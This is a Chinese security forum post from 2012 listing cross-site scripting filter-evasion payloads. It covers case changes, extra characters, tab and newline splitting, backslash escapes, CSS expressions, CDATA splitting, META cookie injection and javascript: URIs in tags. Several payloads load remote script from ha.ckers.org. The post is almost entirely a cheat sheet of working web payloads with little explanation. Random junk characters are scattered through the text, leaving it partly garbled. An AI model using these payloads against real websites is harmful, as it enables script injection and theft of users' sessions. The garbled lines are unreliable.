找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2241|回复: 0
打印 上一主题 下一主题

Cross Site Scripting(XSS)攻击手法介绍

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:59:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1. 改变字符大小写  t5 ~# G8 a# Y$ ]* W% r& |

' G9 A( w2 M& i/ X! j& Q, f
- ^( }$ t& M" y3 T* P
2 S" N9 @( h% R* n7 ]6 J. E    <sCript>alert(‘d’)</scRipT>
2 a) J$ |3 Y2 a1 J4 x: _6 d  a# G+ V0 T
2. 利用多加一些其它字符来规避Regular Expression的检查* h1 F* C) }+ }! o
* s( S: g; I8 ~& I3 U
    <<script>alert(‘c’)//<</script>
; Q' B9 ^( L6 a- Q5 s* z7 x, Q$ T  p8 z! W* [
    <SCRIPT a=">" SRC="t.js"></SCRIPT>
9 Z3 K) o8 U% i* E& l% r( u. @6 T7 o
( i# D& [1 z$ n$ b$ ^: U* G    <SCRIPT =">" SRC="t.js"></SCRIPT>4 z' B- e6 t4 n$ l+ `) j7 E0 g) T6 I
. r4 o* [. \) ~( u$ _
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>! W! |  F/ l( [

, g/ n- p/ Z% p4 {% c% _    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>/ |% j* U; ]& O$ I2 }, x" n

& y  h$ K2 Y: U# u7 L4 A& b    <SCRIPT a=`>` SRC="t.js"></SCRIPT>1 p. H1 N$ P9 [( f
8 ]9 E. `: ^8 H8 g; y
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
0 Y/ Z2 u" |/ L) u
# `6 Z% O3 F. Y+ V6 M3 }3. 以其它扩展名取代.js
0 p2 J+ w3 H! k7 S+ e+ }+ w6 i' M9 x. P6 A
    <script src="bad.jpg"></script>+ Q% b8 J2 _# N: h2 T8 B
$ e+ N. k5 n0 g$ t3 i$ E
4. 将Javascript写在CSS档里
8 |. M# z9 H  k. P  G! \5 j; ^/ l
# ]; S# f3 I7 Z1 R  A/ L1 Z    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">) I: {1 x2 r/ r9 |/ l
! F; P2 {0 O0 p) k& C. n
       example:
9 n' I" X" f4 }- ]+ V: x; \. |8 d& O7 Y
          body {
$ A' v, I' i" T5 E; c4 v
9 s0 h' C3 p3 f               background-image: url(‘javascript:alert("XSS");’)- E/ Q, _4 F" v" k) E
2 B: z5 m+ F; X# ]5 P0 K9 K
          }
. z& g6 E3 _; W+ e  {; R+ F' H1 l% T, o+ {1 W' s/ i4 g2 c* P' V
5. 在script的tag里加入一些其它字符( g" S8 O) C5 u9 t8 A

& n& d; e2 N: P- q0 D3 a& K    <SCRIPT/SRC="t.js"></SCRIPT>- i' U2 Y+ I# `% Y" d! r

0 }$ e2 }  n" e' {    <SCRIPT/anyword SRC="t.js"></SCRIPT>0 S* _' x6 r& Y# c
1 w* n5 V: o! d
6. 使用tab或是new line来规避
7 A- _& D  b1 z; D+ `
5 O$ X2 {" f9 b6 H& h- d, y    <img src="jav ascr ipt:alert(‘XSS3′)">
; S0 n5 Z( D2 R" F' I1 [5 ^' h9 y- K3 x1 ?! L5 s
    <img src="jav ascr ipt:alert(‘XSS3′)">
" }# d, S, D' M: V# ^+ r6 b7 r
8 P, d7 d9 Z# E9 e0 T5 G4 |    <IMG SRC="jav ascript:alert(‘XSS’);">' ~; h' |1 K! C# K: l- ^
- t! N0 _  k/ T' y# b
         -> tag9 A3 S6 i; t% H5 I: F6 n

1 q. W' @$ h) n         -> new line
: s; m& f1 \) R" H: g
2 T* y; \8 y+ t/ ]/ T7. 使用"\"来规避* p2 O" M- Q5 Y. Y9 }
8 C1 n# _  D$ p. t+ d/ j
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>+ R8 E* \% h( V$ z' Q2 D  t. {

0 Y5 N- z; P# k" }* y6 D% T    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
% @3 r$ a) g* {* k# [
+ j: e) e1 i5 j, r  k9 l    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">7 k( g  }/ l/ s  _5 j7 Q+ u

  |" {3 O$ v8 F0 M3 T    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">7 X: P) [5 B: b' K* s$ x+ E7 a  P

' v5 C+ \. b8 I+ `! Y+ |9 X    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>6 o. g! V' Y5 Q6 X' [

, B  l4 u( v$ i- u2 ?. {8. 使用Hex encode来规避(也可能会把";"拿掉)6 Z7 l$ ^$ D+ o# h8 ~  L
4 M  y# {7 |, B
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
! I( \0 d( t2 H8 g! a3 R
, \  h3 N; p6 b6 i0 q6 B        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">2 ]9 V6 i9 H! Z
9 T+ U* \/ z  C* j! ^
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">' d1 B9 h3 _1 Z6 ]$ U( Q
0 k3 e& Q; ~- ?4 G! Y& R
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">5 G3 n; M& p" ~9 K. p% @
. x& Q+ h* S1 \. f
9. script in HTML tag
7 w% ]& Y7 [$ q! J( H' u9 T" G8 S
    <body onload=」alert(‘onload’)」>
& M; \+ Y, A7 \; A* b4 D5 g; T0 @+ b7 x
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload  _2 Z' O! m/ [5 \. c5 E
/ ?4 p6 j) `' W6 N# X
10. 在swf里含有xss的code
5 M& l/ `9 }+ i+ v  b4 s3 r6 w5 l
3 S! F- T% M% I. ?    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
% M" d0 Q) ?) z' ^
2 ?3 @" c" K$ x  X/ g1 Z8 t1 t9 D11. 利用CDATA将xss的code拆开,再组合起来。$ D/ X# v- e5 K

  o' \4 e) ^/ t5 Z1 p$ c1 q    <XML ID=I><X><C>
5 Y8 c' e! I- `, s5 X) G6 E+ @6 \1 |& N( X  t! r+ [
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
: c+ W6 A# X: q' t$ ~+ a9 h( N8 z! e7 g' a8 l4 r6 G9 C
    </C></X>
9 o. E0 E; l$ V& X% K# n% \  F/ ~' B7 j
    </xml>
7 z! L0 r/ ^+ V6 [
! n, U0 Y" N7 U0 @4 g# R; ~0 b% N5 Q    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
. i/ Y8 r6 @+ w  j9 R4 I
" m; F8 z; n, k7 P! U( A# ?    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
( _& C0 k* {2 Z9 N5 u1 l
, p$ B) ?$ ]1 e    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# J4 V- [: u! m6 A5 e: y  {7 o9 B. a- }: l
12. 利用HTML+TIME。
, `- l$ F/ e! [  n' _( I  n7 V+ t2 q; K; F9 b; d
    <HTML><BODY>
4 i: Q% w  n) {4 b3 }' z4 A: J; f0 D) c1 p/ M* y  p. B3 a
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">& _! z( O/ F+ d

$ P0 @* w) h/ N8 i) ^/ J' x9 t    <?import namespace="t" implementation="#default#time2">* Y4 Q5 E4 o* u5 W

* t  ]' `% V, J& w! [% k& c    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
+ F: U" j5 h: \, V, Y  T* p$ l: S3 t2 y# ]  Q
    </BODY></HTML>
9 S& [# A  j- H# g' N& ^# b* l2 p9 a
13. 透过META写入Cookie。$ q$ Y+ z# H+ V5 Z

* t' q2 U4 K* N: q( k# d    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">1 h/ D* v( J$ d) z, N% h7 t

# {/ T( \# ^! D8 G& C  O14. javascript in src , href , url
8 c* K$ f- w7 ]/ `4 Z3 G4 n& @; l
4 t/ [! _3 j; t- }6 K8 J% W& ]9 R9 r    <IFRAME SRC=javascript:alert(’13′)></IFRAME>$ y+ c/ m" |/ l2 {& w% @

) }2 @/ _8 g6 q! W( D; O: {/ y" b    <img src="javascript:alert(‘XSS3′)">3 h3 e, I5 ]. k: w' N7 l
/ ^" R) T7 r5 L" j& N
<IMG DYNSRC="javascript:alert(‘XSS20′)">
2 h, z' P( `' d5 S3 w/ U* }- F  @8 s* E  k" x
    <IMG LOWSRC="javascript:alert(‘XSS21′)">( X+ b! y- v) F. x$ K
' ]6 ~* I' Z% R5 T# p+ H
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">3 q! T2 t8 q# P

4 b( w; I. G+ p2 B' B/ N    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
- y* x- r) Y0 g' S. v% I, z: r# f" I! [5 D- ^6 f# `* l
    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
% ~' r! L: P9 R8 y, G
5 }* F) @$ A# e    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">. W2 l9 N! O6 E: R3 ^3 \

3 ?5 I& C% Z( ~+ o+ r    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}2 a/ O6 q, }! H# l9 x

  x( {' Z1 s# _* M, z    </STYLE><A CLASS=XSS></A>
3 B9 a& O0 ^# `  ]$ n! l1 W% K6 P5 {/ L; D
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>4 J% A) J2 m& D
' d! K! _0 h( G3 M  b! }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表